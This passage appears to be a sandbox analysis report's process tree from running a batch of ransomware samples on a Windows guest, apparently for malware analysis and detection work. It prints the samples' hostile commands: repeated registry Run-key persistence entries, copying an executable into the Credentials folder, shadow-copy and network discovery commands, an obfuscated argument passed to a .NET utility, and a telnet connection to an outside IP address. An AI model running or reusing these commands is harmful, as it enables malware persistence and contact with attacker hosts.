                                                                                      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                      9⤵
                                                                                        PID:9124
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                        9⤵
                                                                                          PID:7044
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                          9⤵
                                                                                            PID:5632
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                            9⤵
                                                                                              PID:8748
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                              9⤵
                                                                                                PID:9884
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                9⤵
                                                                                                  PID:7312
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                  9⤵
                                                                                                    PID:8408
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                    9⤵
                                                                                                      PID:5392
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                      9⤵
                                                                                                        PID:4636
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                        9⤵
                                                                                                          PID:9008
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                          9⤵
                                                                                                            PID:5896
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                            9⤵
                                                                                                              PID:6036
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                              9⤵
                                                                                                                PID:11708
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                9⤵
                                                                                                                  PID:228
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                  9⤵
                                                                                                                    PID:4408
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                    9⤵
                                                                                                                      PID:5592
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                      9⤵
                                                                                                                        PID:7616
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                        9⤵
                                                                                                                          PID:6448
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                          9⤵
                                                                                                                            PID:11136
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                            9⤵
                                                                                                                              PID:9336
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                              9⤵
                                                                                                                                PID:5776
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                                9⤵
                                                                                                                                  PID:7752
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                                  9⤵
                                                                                                                                    PID:5800
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                                    9⤵
                                                                                                                                      PID:7872
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                                                                      9⤵
                                                                                                                                        PID:10100
                                                                                                                          • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.MyxaH.gen-4f966bf005602a2308d565140c5f452e1b7a15ef1b196de730972482fbd4f9f2.exe
                                                                                                                            HEUR-Trojan-Ransom.Win32.MyxaH.gen-4f966bf005602a2308d565140c5f452e1b7a15ef1b196de730972482fbd4f9f2.exe
                                                                                                                            3⤵
                                                                                                                            • Deletes itself
                                                                                                                            • Executes dropped EXE
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3120
                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              rundll32.exe Aphrodisia,Poulenc
                                                                                                                              4⤵
                                                                                                                                PID:10348
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\system32\cmd.exe"
                                                                                                                                  5⤵
                                                                                                                                    PID:5352
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\system32\cmd.exe"
                                                                                                                                    5⤵
                                                                                                                                      PID:6684
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "COPY /Y /B "C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.MyxaH.gen-4f966bf005602a2308d565140c5f452e1b7a15ef1b196de730972482fbd4f9f2.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\ndadmin.exe""
                                                                                                                                        6⤵
                                                                                                                                          PID:11108
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:10568
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "COPY /Y /B "C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.MyxaH.gen-4f966bf005602a2308d565140c5f452e1b7a15ef1b196de730972482fbd4f9f2.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\ndadmin.exe""
                                                                                                                                            6⤵
                                                                                                                                              PID:212
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe"
                                                                                                                                                7⤵
                                                                                                                                                  PID:12012
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "COPY /Y /B "C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.MyxaH.gen-4f966bf005602a2308d565140c5f452e1b7a15ef1b196de730972482fbd4f9f2.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\ndadmin.exe""
                                                                                                                                                6⤵
                                                                                                                                                  PID:9680
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:11424
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "COPY /Y /B "C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.MyxaH.gen-4f966bf005602a2308d565140c5f452e1b7a15ef1b196de730972482fbd4f9f2.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\ndadmin.exe""
                                                                                                                                                    6⤵
                                                                                                                                                      PID:7540
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:1744
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "COPY /Y /B "C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.MyxaH.gen-4f966bf005602a2308d565140c5f452e1b7a15ef1b196de730972482fbd4f9f2.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\ndadmin.exe""
                                                                                                                                                        6⤵
                                                                                                                                                          PID:6340
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:10204
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "COPY /Y /B "C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.MyxaH.gen-4f966bf005602a2308d565140c5f452e1b7a15ef1b196de730972482fbd4f9f2.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\ndadmin.exe""
                                                                                                                                                            6⤵
                                                                                                                                                              PID:11676
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe"
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:5736
                                                                                                                                                        • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.Zerber.gen-242181fc34195146896cf99a1d3796b89485b2fa3668122f430ac8107320948d.exe
                                                                                                                                                          HEUR-Trojan-Ransom.Win32.Zerber.gen-242181fc34195146896cf99a1d3796b89485b2fa3668122f430ac8107320948d.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:1696
                                                                                                                                                        • C:\Users\Admin\Desktop\00402\Trojan-Ransom.MSIL.Blocker.bu-2e9d5812c5db245ab0ce4833b5e014267745132530593e0ed8fb75d7bd2ae012.exe
                                                                                                                                                          Trojan-Ransom.MSIL.Blocker.bu-2e9d5812c5db245ab0ce4833b5e014267745132530593e0ed8fb75d7bd2ae012.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:4636
                                                                                                                                                          • C:\Windows\SysWOW64\arp.exe
                                                                                                                                                            "C:\Windows\System32\arp.exe" -a
                                                                                                                                                            4⤵
                                                                                                                                                            • Network Service Discovery
                                                                                                                                                            PID:9116
                                                                                                                                                        • C:\Users\Admin\Desktop\00402\Trojan-Ransom.MSIL.Sram.w-9982b92bc41fc0de97fabe93a4ef77e96e06f2290339f7c5fee0006244c33cc8.exe
                                                                                                                                                          Trojan-Ransom.MSIL.Sram.w-9982b92bc41fc0de97fabe93a4ef77e96e06f2290339f7c5fee0006244c33cc8.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:2124
                                                                                                                                                        • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Avaddon.o-cd367626c1f1475de5974556b18e067f08706013e17193a0ffacb3966ce91c35.exe
                                                                                                                                                          Trojan-Ransom.Win32.Avaddon.o-cd367626c1f1475de5974556b18e067f08706013e17193a0ffacb3966ce91c35.exe
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1212
                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                              wmic.exe SHADOWCOPY /nointeractive
                                                                                                                                                              4⤵
                                                                                                                                                                PID:1824
                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                                wmic.exe SHADOWCOPY /nointeractive
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:6304
                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                                  wmic.exe SHADOWCOPY /nointeractive
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:7820
                                                                                                                                                                • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Blocker.drgk-810c35afc3784cd3394e4698ad685ffbbd525baeeda8f19b1afad78616ea87a3.exe
                                                                                                                                                                  Trojan-Ransom.Win32.Blocker.drgk-810c35afc3784cd3394e4698ad685ffbbd525baeeda8f19b1afad78616ea87a3.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:812
                                                                                                                                                                    • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Blocker.drgk-810c35afc3784cd3394e4698ad685ffbbd525baeeda8f19b1afad78616ea87a3.exe
                                                                                                                                                                      C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Blocker.drgk-810c35afc3784cd3394e4698ad685ffbbd525baeeda8f19b1afad78616ea87a3.exe
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:5444
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5444 -s 80
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6872
                                                                                                                                                                    • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Blocker.erpx-d63654a3de9ea6c69fa67e17c88c39cc4109cea26658aa96a68fd85ceb52d032.exe
                                                                                                                                                                      Trojan-Ransom.Win32.Blocker.erpx-d63654a3de9ea6c69fa67e17c88c39cc4109cea26658aa96a68fd85ceb52d032.exe
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5264
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5264 -s 428
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:7240
                                                                                                                                                                      • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Blocker.hrft-f9a4ca25bc03af4718bd0304a26b877569839e4d328b4355f26f1537bfcca6fe.exe
                                                                                                                                                                        Trojan-Ransom.Win32.Blocker.hrft-f9a4ca25bc03af4718bd0304a26b877569839e4d328b4355f26f1537bfcca6fe.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:6324
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\FB_BD.tmp.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\FB_BD.tmp.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:8536
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\FB_18F9.tmp.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\FB_18F9.tmp.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:6536
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\FB_18F9.tmp.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\FB_18F9.tmp.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:5248
                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" p93QJHGCFR6q8J23Ousk56RQ39KGE57Wq4GwnW6uul525TQS5OGdJ4NU375Qu0auUWDoTBSOFW9dMyW5DLHMQWtUX6PA8Rg0DROT7bW83OIQ1PS35C06Cc5cjV84s29IXhC0mGGBJUiEPAmfUgMoiP2BD98lIA6R29DPSv7PuDfDWCTC5H2B8r8LRmIaL3VwoULSQMWl7NNw81i87EOSrC1YuuCYvhNOtEI6x4E0USpYppHa54rLVeiv8wnKJO74WbTRYQD69JTGrTPl3CCx5n4cB9MhdUmv6b9AI00s6Dk4NMTyRHO1ScuE19ma0bEBLhA1KctCHg8MaV8R676M7BU2d5V54PSX2sbBqY447k3MVUFUK6R9OrYJb7F7XJ582gCXj827CER321WpYN1Wl78Cm6Y3203VAL365S5KPyC8nAbuXnUU9bI2F91O7YOulea468SOtO12AP29CURrfH10Au1B1LANKUbW88F5oKS0QPDwSNAFDi3HM76N18GM2W6kLCHoerU9wriGm0NC1PXh18NET61p4S02t8OGSi1BFqI1tvYW72GubGQNWE39Jqh04BEwNoF4hDOb7rV0tfu6X89US02e524cSo3pl8t94KXaHWmPMWxedtXjyPS6I7QpEYXb63ODo6tQBQ4AVDfP8ERtmeCqWY3eMG8F8x4PqHnThX4ORIjQALWF83xr2YJ5SbqFM6r97xHh2O5FMJylQHOwQ69H3Vn3PTAs3rG7FK7xRK65onahXI3P7XOAqS8XuyeSGDVjx8A0vB6JHTdIGlRrX068T0NUOJ92yIH1HE9R3XgcMT085U5OOQKlQXEbQ2QXIG5VsV20bRjcJGV473Xq823E84JHGWN7N2x0090H5XB33n2yPWYXIq539td8LI95Hg94OcA1oxigP9JVMBA153IMR5IC6MYSR6F7YJw7NU7JDOWEYbG96vTh6ChsrRSsF1SQGnDXcHR5el6K7nGGS1AVSETFa1w3q7kX00WGIf8FK6MnI2
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:5376
                                                                                                                                                                                • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Crusis.aec-6a6bf3f814aebbae119145f0f412c38d8ff5a888da9fa86bdd204caedf147b5b.exe
                                                                                                                                                                                  Trojan-Ransom.Win32.Crusis.aec-6a6bf3f814aebbae119145f0f412c38d8ff5a888da9fa86bdd204caedf147b5b.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:8368
                                                                                                                                                                                  • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.DoppelPaymer.q-312ec977274d515baa6e891b36ee5b5325164bd03cc8d8575cc3975ebc53d3e8.exe
                                                                                                                                                                                    Trojan-Ransom.Win32.DoppelPaymer.q-312ec977274d515baa6e891b36ee5b5325164bd03cc8d8575cc3975ebc53d3e8.exe
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:7512
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 444
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:6744
                                                                                                                                                                                    • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Encoder.klh-069cdb5dab513586782df984318d0bd70ade97c4f2af86ad1015d42f754045b9.exe
                                                                                                                                                                                      Trojan-Ransom.Win32.Encoder.klh-069cdb5dab513586782df984318d0bd70ade97c4f2af86ad1015d42f754045b9.exe
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:8428
                                                                                                                                                                                      • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.GandCrypt.jme-ff80e650156028f9f1f4ea09b9c4ace5ba3278905f488674e75bee6baf4f3c59.exe
                                                                                                                                                                                        Trojan-Ransom.Win32.GandCrypt.jme-ff80e650156028f9f1f4ea09b9c4ace5ba3278905f488674e75bee6baf4f3c59.exe
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:6040
                                                                                                                                                                                        • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Gen.ywq-75909a8f3d534e473f1d8c3d5eb0e96922bc20c8af5a4e435d25c8746b4cb393.exe
                                                                                                                                                                                          Trojan-Ransom.Win32.Gen.ywq-75909a8f3d534e473f1d8c3d5eb0e96922bc20c8af5a4e435d25c8746b4cb393.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2648
                                                                                                                                                                                          • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Phpw.acq-c2463a34475c692036ebeaa3d2a632b3d885501d7458d4d980c21e7af148405e.exe
                                                                                                                                                                                            Trojan-Ransom.Win32.Phpw.acq-c2463a34475c692036ebeaa3d2a632b3d885501d7458d4d980c21e7af148405e.exe
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3896
                                                                                                                                                                                            • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.PornoBlocker.ajrm-173f96065450c5ccb78988dc98abcd0794dd2ac5734e367f5645403c21715b96.exe
                                                                                                                                                                                              Trojan-Ransom.Win32.PornoBlocker.ajrm-173f96065450c5ccb78988dc98abcd0794dd2ac5734e367f5645403c21715b96.exe
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:7008
                                                                                                                                                                                                • C:\Program Files (x86)\38582cbd\jusched.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\38582cbd\jusched.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:6564
                                                                                                                                                                                                • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Sodin.abw-d91f951bdcf35012ac6b47c28cf32ec143e4269243d8c229f6cb326fd343df95.exe
                                                                                                                                                                                                  Trojan-Ransom.Win32.Sodin.abw-d91f951bdcf35012ac6b47c28cf32ec143e4269243d8c229f6cb326fd343df95.exe
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:7040
                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Vega.ad-1b6b6676afb83d4633a15b1f18301c6523ec7cfbd76d1befe8f82fd6c729cb76.exe
                                                                                                                                                                                                    Trojan-Ransom.Win32.Vega.ad-1b6b6676afb83d4633a15b1f18301c6523ec7cfbd76d1befe8f82fd6c729cb76.exe
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:6336
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:10068
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 10068 -s 1932
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:6404
                                                                                                                                                                                                        • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                          notepad.exe
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:4696
                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Wanna.aqyo-a513a1e6378616e5d945a575eeff50c6fbc1713c17f0d9132c2d34a82454f524.exe
                                                                                                                                                                                                          Trojan-Ransom.Win32.Wanna.aqyo-a513a1e6378616e5d945a575eeff50c6fbc1713c17f0d9132c2d34a82454f524.exe
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:8256
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A2F8.tmp\A2F9.bat C:\Users\Admin\Desktop\00402\Trojan-Ransom.Win32.Wanna.aqyo-a513a1e6378616e5d945a575eeff50c6fbc1713c17f0d9132c2d34a82454f524.exe"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:9168
                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                  ping -n 7 127.0.0.1
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                  PID:7328
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\A2F8.tmp\telnet.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\A2F8.tmp\\telnet.exe 91.220.188.200 61911
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:4844
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ipconfig.EXE /all | find "IP" | find "10.77."
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:300
